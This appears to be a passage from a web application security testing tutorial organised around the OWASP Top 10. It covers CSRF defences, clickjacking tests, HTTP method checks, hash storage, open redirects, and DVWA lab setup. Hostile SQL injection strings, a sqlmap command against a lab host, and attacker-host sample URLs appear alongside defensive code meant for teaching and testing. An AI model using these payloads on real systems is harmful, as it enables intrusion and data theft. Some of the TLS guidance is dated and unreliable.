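def issue_token(session):
    """Create a per-session anti-CSRF token, store it and return it."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token

def is_forged(session, request):
    """True when a request to a state-changing endpoint must be rejected.

    request is a plain dict {"method", "path", "headers", "form"}.
    Two independent signals are checked:
      1. Origin (or Referer), when sent, must match the site's own origin;
         an <img> on an attacker's page sends the attacker's origin, if any.
      2. The form must carry the token stored in the victim's session; an
         <img> tag cannot read that session, so it cannot supply the token.
    """
    if request["path"] not in STATE_CHANGING:
        return False
    headers = request.get("headers", {})
    origin = headers.get("Origin") or headers.get("Referer", "")
    if origin:
        o = urlsplit(origin)
        if f"{o.scheme}://{o.netloc}" != SITE_ORIGIN:
            return True
    expected = session.get("csrf_token", "")
    submitted = request.get("form", {}).get("csrf_token", "")
    if not expected or not submitted:
        return True
    return not hmac.compare_digest(expected, submitted)

def demo():
    """Legitimate POST with token vs. the forged img-tag GET from another site."""
    session = {}
    token = issue_token(session)
    good = {"method": "POST", "path": "/change_password",
            "headers": {"Origin": SITE_ORIGIN},
            "form": {"csrf_token": token, "new": "x"}}
    forged = {"method": "GET", "path": "/change_password",
              "headers": {"Referer": "http://attacker.example/forged.html"},
              "form": {"new": "x"}}
    return is_forged(session, good), is_forged(session, forged)

if __name__ == "__main__":
    print(demo())   # (False, True)
```

The img-tag request from step 10 fails here on both counts: it carries the attacker's Referer and cannot include the session's token.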

Clickjacking

Clickjacking Test Page

To test whether a site is vulnerable to clickjacking, create an HTML page similar to the following, changing the URL in the iframe src to point to your target site:

<html>
<head><title>Clickjack test page</title></head>
<body>
<p>You've been clickjacked!</p>
<iframe sandbox="allow-scripts allow-forms" src="http://localhost:8080/" style="width:100%;height:90%"></iframe>
</body>
</html>

If you see the text “You’ve been clickjacked!” at the top of the page, your site is vulnerable. With a clickjacking defense script installed, your site should break out of the site that is framing it, and that text will not be displayed. If the user’s browser has Javascript turned off, the target site should not display at all. Note that the sandbox attribute on the iframe above withholds allow-top-navigation, so a purely script-based defense cannot break out of this particular frame; a header-based defense such as X-Frame-Options is what makes the framed page stay blank here.

1.6 A6 Security Misconfiguration: Testing for HTTP Methods and XST

Directory listing is not disabled on your server. An attacker discovers he can find all files on your server by simply listing the directories. The attacker finds and downloads all your compiled Java classes, which he reverses to get all your custom code. He then finds a serious access control flaw in your application.

The HTTP methods that should be disabled are the following:

• PUT: This method allows a client to upload new files on the web server. An attacker can exploit it by uploading malicious files (e.g. an asp file that executes commands by invoking cmd.exe), or by simply using the victim's server as a file repository

• DELETE: This method allows a client to delete a file on the web server. An attacker can exploit it as a very simple and direct way to deface a web site or to mount a DoS attack

• CONNECT: This method could allow a client to use the web server as a proxy

• TRACE: This method simply echoes back to the client whatever string has been sent to the server, and is used mainly for debugging purposes. This method, originally assumed harmless, can be used to mount an attack known as Cross Site Tracing, which was discovered by Jeremiah Grossman (see links at the bottom of the page)
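An automated version of this check, added as an example (not from the original document): it parses the Allow header a server returns to an OPTIONS request and probes TRACE with a marker header; the script name in the usage comment is constructed.

```python
import http.client
import sys

# Methods the section above says should be disabled on a production server.
DANGEROUS = {"PUT", "DELETE", "CONNECT", "TRACE"}

def risky_methods(allow_header):
    """Return, sorted, the dangerous methods advertised in an Allow header value."""
    advertised = {m.strip().upper() for m in allow_header.split(",") if m.strip()}
    return sorted(advertised & DANGEROUS)

def options_allow(host, port=80, path="/", timeout=5):
    """Send an OPTIONS request and return the Allow header value ('' if absent)."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("OPTIONS", path)
        return conn.getresponse().getheader("Allow", "") or ""
    finally:
        conn.close()

def trace_enabled(host, port=80, path="/", timeout=5):
    """True if TRACE is answered with 200 and our request header comes back in
    the body, i.e. the server echoes requests (the precondition for XST)."""
    marker = "X-Trace-Check"
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("TRACE", path, headers={marker: "probe"})
        resp = conn.getresponse()
        body = resp.read().decode("latin-1", "replace")
        return resp.status == 200 and marker.lower() in body.lower()
    finally:
        conn.close()

if __name__ == "__main__":
    # usage: python check_methods.py <host> [port]   (constructed script name)
    host = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    allow = options_allow(host, port)
    print("Allow header :", allow or "(none)")
    print("risky methods:", risky_methods(allow))
    print("TRACE echoes :", trace_enabled(host, port))
```

An Allow header is only what the server advertises; a method missing from it can still be accepted, so a clean result is necessary but not sufficient.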

1.7 A7 Insecure Cryptographic Storage

For example, passwords, credit cards, health records, and personal information should be encrypted. For all such data, ensure:

1. It is encrypted everywhere it is stored long term, particularly in backups of this data.

2. Only authorized users can access decrypted copies of the data (i.e., access control; see A4 and A8).

3. A strong standard encryption algorithm is used.

4. A strong key is generated, protected from unauthorized access, and key change is planned for.

Check that passwords are hashed

1. How to check whether passwords, credit cards and other personal data are properly stored in the database: go to the database and find the table with passwords, credit cards and other personal data.

2. Copy the hash value

3. Start some program (e.g. http://www.sha1-lookup.com) to search for the reverse value of the copied hash.


4. If a strong algorithm is used, the attacker should not be able to recover the original value from the copied hash.
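The lookup from step 3 and the storage scheme that defeats it, added here as an example rather than the document's own procedure; the list of common passwords standing in for a reverse-lookup site and the record format are constructed for illustration.

```python
import hashlib
import hmac
import os

# Constructed stand-in for a reverse-lookup site: precomputed SHA-1 of common
# passwords. Real services hold billions of such entries.
COMMON_PASSWORDS = ["123456", "password", "qwerty", "letmein"]
SHA1_LOOKUP = {hashlib.sha1(p.encode()).hexdigest(): p for p in COMMON_PASSWORDS}

def reverse_lookup(hexdigest):
    """What step 3 does: return the plaintext if the hash is already known."""
    return SHA1_LOOKUP.get(hexdigest)

def store_weak(password):
    """Unsalted SHA-1: equal passwords give equal, lookup-able hashes."""
    return hashlib.sha1(password.encode()).hexdigest()

def store_strong(password, salt=None, iterations=200_000):
    """Salted, iterated PBKDF2-HMAC-SHA256; the record carries its own parameters."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"

def verify_strong(password, record):
    """Recompute with the stored salt/iterations and compare in constant time."""
    _alg, iters, salt_hex, dk_hex = record.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)

def audit(records):
    """Step 4, automated: the stored hashes a lookup table reverses, with plaintext."""
    return {h: p for h in records if (p := reverse_lookup(h)) is not None}

if __name__ == "__main__":
    print(audit([store_weak("qwerty"), store_weak("Tr0ub4dor&3")]))  # qwerty found
    rec = store_strong("qwerty")
    print(reverse_lookup(rec), verify_strong("qwerty", rec))         # None True
```

Two users with the same password get different salted records, so no precomputed table can answer the lookup in step 3.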

1.8 A8 Failure to Restrict URL Access

An attacker, who is an authorized system user, simply changes the URL to a privileged page. Is access granted? Anonymous users could access private pages that aren’t protected.

If a user has no privilege to see some pages on the site, the system should prevent him/her from reaching them by typing the URL address of such a page in the browser.

1.9 A9 Insufficient Transport Layer Protection

Transport Layer Security (TLS) and its predecessor, Secure Sockets Layer (SSL), are cryptographic protocols that provide communication security over the Internet. TLS and SSL encrypt the segments of network connections at the Application Layer for the Transport Layer, using asymmetric cryptography for key exchange, symmetric encryption for confidentiality, and message authentication codes for message integrity.

SSL Algorithms

For example:

To check the SSL algorithms on a server, the “sslscan” tool, which is part of the BackTrack distribution, should be used.

• Run BackTrack5
• From the Main menu select Information Gathering > Network Analysis > Service Fingerprinting > sslscan
• Enter the server IP address you want to test and press enter


This tool helps testers to check whether the web server runs the latest SSL version (version 3) or TLS version 1. There are still some outdated servers running SSL version 2.

Information Gathering > Network Analysis > Identify Live Hosts > nmap

SSL Key Lengths

Guidelines for SSL key lengths⁴ are presented in the table below:

Certificate expiry date          | Minimum RSA public key length
On or before 31st December 2013  | 1024
After 31st December 2013         | 2048

Steps to check the RSA Public Key:
• Run BackTrack5
• From the Main menu select Information Gathering > Network Analysis > Service Fingerprinting > sslscan
• Enter the server IP address you want to test and press enter

Digital Certificate Validity

Steps to check the RSA Public Key:
• Run BackTrack5
• From the Main menu select Information Gathering > Network Analysis > Service Fingerprinting > sslscan
• Enter the server IP address you want to test and press enter

⁴ http://news.netcraft.com/archives/2012/09/10/minimum-rsa-public-key-lengths-guidelines-or-rules.html


1.10 A10 Unvalidated Redirects and Forwards

If the application has a redirect page, or the application uses forwards to route requests between different parts of the site, that is potentially dangerous, because an attacker may exploit the redirect or forward to send users to some malicious site by entering the address of the malicious site in the URL.

For example: http://www.example.com/redirect.jsp?url=evil.com

• Create/use a spider to crawl your own site
• Look at the logs for redirects
  o 300-series statuses
  o 302 & 303
  o 302 = old-school page moved
  o 303 = proper redirection
• Try to change the URL by hand.
• Try to brute-force change it via an HTTP re-writer.
• If either works, you have a vulnerability.
• Modify the page to hard-code the destination.
• If that isn't possible, only allow the user to choose from a list.
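A validator for the redirect.jsp?url= pattern above, added as an example that is not part of the original document; the allowed hosts and destination names are constructed, and the three handlers show the unvalidated page, the validated page and the "choose from a list" fix from the last step.

```python
from urllib.parse import urlsplit

# Constructed allow-list: hosts this site may send users to.
ALLOWED_HOSTS = {"www.example.com", "help.example.com"}

# "Only allow the user to choose from a list": names map to destinations, so
# the URL parameter never carries a destination at all.
DESTINATIONS = {"home": "/", "account": "/account",
                "help": "https://help.example.com/"}

def is_safe_redirect(target, allowed_hosts=ALLOWED_HOSTS):
    """Accept a site-relative path or an absolute http(s) URL to an allowed host."""
    if not target or any(c in target for c in "\r\n\x00"):
        return False                       # empty value or header injection
    parts = urlsplit(target)
    if parts.scheme == "" and parts.netloc == "":
        # relative: must start with a single '/'; '//host' and '/\host' are
        # treated as protocol-relative by browsers, so reject both
        return (target.startswith("/") and not target.startswith("//")
                and "\\" not in target)
    return parts.scheme in ("http", "https") and parts.hostname in allowed_hosts

def redirect_vulnerable(url):
    """The redirect.jsp?url=... pattern from the text: target used as given."""
    return url

def redirect_validated(url, fallback="/"):
    """Hardened form: a target that fails validation goes to a fixed page."""
    return url if is_safe_redirect(url) else fallback

def redirect_by_name(name, fallback="/"):
    """Hardened form where the user only chooses from a list."""
    return DESTINATIONS.get(name, fallback)

if __name__ == "__main__":
    for t in ["/account", "evil.com", "http://evil.com", "//evil.com",
              "https://www.example.com@evil.com/"]:
        print(f"{t!r:40} vulnerable -> {redirect_vulnerable(t)!r:40} "
              f"validated -> {redirect_validated(t)!r}")
```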


2 Damn Vulnerable Web App (DVWA)

Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.

This web application is designed only for security testing purposes.

Download and install XAMPP from http://www.apachefriends.org/en/xampp-windows.html

Download DVWA from http://www.dvwa.co.uk

Simply unzip dvwa.zip, place the unzipped files in your public html folder, and then point your browser to http://127.0.0.1/dvwa/index.php. The application will be accessible only in the local environment; if you want to access it from another machine, edit the .htaccess file and change this section:

# Limit access to localhost
<Limit GET POST PUT>
order deny,allow
deny from all
allow from 127.0.0.1
</Limit>

to:

# Limit access to localhost
<Limit GET POST PUT>
order deny,allow
allow from all
</Limit>

Set the database credentials in config/config.inc.php:

$_DVWA[ 'db_user' ] = 'your database username';   (in my case 'root')
$_DVWA[ 'db_password' ] = 'your database password';   (in my case 'root')
$_DVWA[ 'db_database' ] = 'dvwa';

In the DVWA application, usernames and passwords are stored in the “dvwa” database in the table named “users”.

SQL injection

Simply stated, SQL injection vulnerabilities are caused by software applications that accept data from an untrusted source (internet users), fail to properly validate and sanitize the data, and subsequently use that data to dynamically construct an SQL query to the database backing that application. For example, imagine a simple application that takes inputs of a username and password. It may ultimately process this input in an SQL statement of the form

string query = "SELECT * FROM users WHERE username = '" + username + "' AND password = '" + password + "'";

Since this query is constructed by concatenating an input string directly from the user, the query behaves correctly only if the password does not contain a single-quote


character. If the user enters admin as the username and example' or 'a'='a as the password, the resulting query becomes

SELECT * FROM users WHERE username = 'admin' AND password = 'example' OR 'a'='a';

The "OR 'a'='a'" clause always evaluates to true and the intended authentication check is bypassed as a result.

The 'id' variable is vulnerable to SQL injection:

SELECT first_name, last_name FROM users WHERE user_id = '$id';

So when the attacker enters id = 1 in the input field “User ID” and submits it, the application will execute the following SQL query:

SELECT first_name, last_name FROM users WHERE user_id = '1';

Insert the following SQL string into the input field: ' or 'a'='a and press Submit

After submitting the SQL string the result is:
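Both injections above run against a constructed in-memory SQLite copy of the users table (an added example, not DVWA's own PHP code), beside the parameterized queries that defeat them:

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the DVWA 'users' table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, "
                 "last_name TEXT, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", [
        (1, "admin", "admin", "admin", "s3cret"),
        (2, "Gordon", "Brown", "gordonb", "abc123"),
        (3, "Hack", "Me", "1337", "charley"),
    ])
    return conn

def login_vulnerable(conn, username, password):
    """The concatenated login query from the text; returns every matched row."""
    query = ("SELECT * FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    return conn.execute(query).fetchall()

def lookup_vulnerable(conn, user_id):
    """DVWA-style 'low' query: the User ID value is pasted into the statement."""
    query = ("SELECT first_name, last_name FROM users WHERE user_id = '"
             + user_id + "';")
    return conn.execute(query).fetchall()

def login_parameterized(conn, username, password):
    """Same query with bound parameters: input can never change the SQL."""
    return conn.execute(
        "SELECT * FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchall()

def lookup_parameterized(conn, user_id):
    return conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?",
        (user_id,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    print(len(login_vulnerable(db, "admin", "example' or 'a'='a")))    # 3 rows
    print(len(login_parameterized(db, "admin", "example' or 'a'='a")))  # 0 rows
    print(lookup_vulnerable(db, "' or 'a'='a"))        # all three names
    print(lookup_parameterized(db, "' or 'a'='a"))     # []
```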

SQL Injection (Blind)

Manipulation of cookie data

• Start the OWASP ZAP tool
• Go to the DVWA login page and enter an incorrect username and password
• Press the Login button
• Intercept the HTTP request


• Start BackTrack5 and run the sqlmap tool
• Type the following:

python ./sqlmap.py -u "http://10.1.1.44/dvwa/vulnerabilities/sqli_blind/?id=5&Submit=Submit" --cookie="security=low; PHPSESSID=<session id from the intercepted request>" --level 5

The OWASP ZAP tool reports 2 alerts with High risk against SQL injection.


Appendix

The OWASP Top 10 Web Application Security Risks⁵, as of the 2010 list, are:

• A1: Injection

o Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data.

• A2: Cross-Site Scripting (XSS)

o XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation and escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.

• A3: Broken Authentication and Session Management

o Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, session tokens, or exploit other implementation flaws to assume other users’ identities.

• A4: Insecure Direct Object References

o A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.

• A5: Cross-Site Request Forgery (CSRF) (UPDATE 4/21: New in-depth article on CSRF here)

o A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim’s browser to generate requests the vulnerable application thinks are legitimate requests from the victim.

• A6: Security Misconfiguration

o Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. All these settings should be defined, implemented, and maintained as many are not shipped with secure defaults. This includes keeping all software up to date, including all code libraries used by the application.

• A7: Insecure Cryptographic Storage

o Many web applications do not properly protect sensitive data, such as credit cards, SSNs, and authentication credentials, with appropriate encryption or hashing. Attackers may steal or modify such weakly protected data to conduct identity theft, credit card fraud, or other crimes.

⁵ Reference: http://resources.infosecinstitute.com/owasp-top-10-tools-and-tactics

• A8: Failure to Restrict URL Access

o Many web applications check URL access rights before rendering protected links and buttons. However, applications need to perform similar access control checks each time these pages are accessed, or attackers will be able to forge URLs to access these hidden pages anyway.

• A9: Insufficient Transport Layer Protection

o Applications frequently fail to authenticate, encrypt, and protect the confidentiality and integrity of sensitive network traffic. When they do, they sometimes support weak algorithms, use expired or invalid certificates, or do not use them correctly.

• A10: Unvalidated Redirects and Forwards

o Web applications frequently redirect and forward users to other pages and websites, and use untrusted data to determine the destination pages. Without proper validation, attackers can redirect victims to phishing or malware sites, or use forwards to access unauthorized pages.

For nine of the OWASP Top 10 web application security risks I will suggest a tool to help you identify and mitigate these risks within your organization’s web applications and services. I will further endeavor to provide a unique tool for each risk, thus avoiding redundancy while providing you with multiple options.

Following is a risk and tool matrix.

RISK                                              | TOOL
A1: Injection                                     | SQL Inject Me
A2: Cross-Site Scripting (XSS)                    | ZAP / XSS Me
A3: Broken Authentication and Session Management  | HackBar / ZAP / WebScarab
A4: Insecure Direct Object References             | Burp / ZAP
A5: Cross-Site Request Forgery (CSRF)             | Tamper Data / Pinata / WebScarab
A6: Security Misconfiguration                     | Watobo
A7: Insecure Cryptographic Storage                | N/A
A8: Failure to Restrict URL Access                | Nikto/Wikto
A9: Insufficient Transport Layer Protection       | Calomel / sslscan
A10: Unvalidated Redirects and Forwards           | Watcher
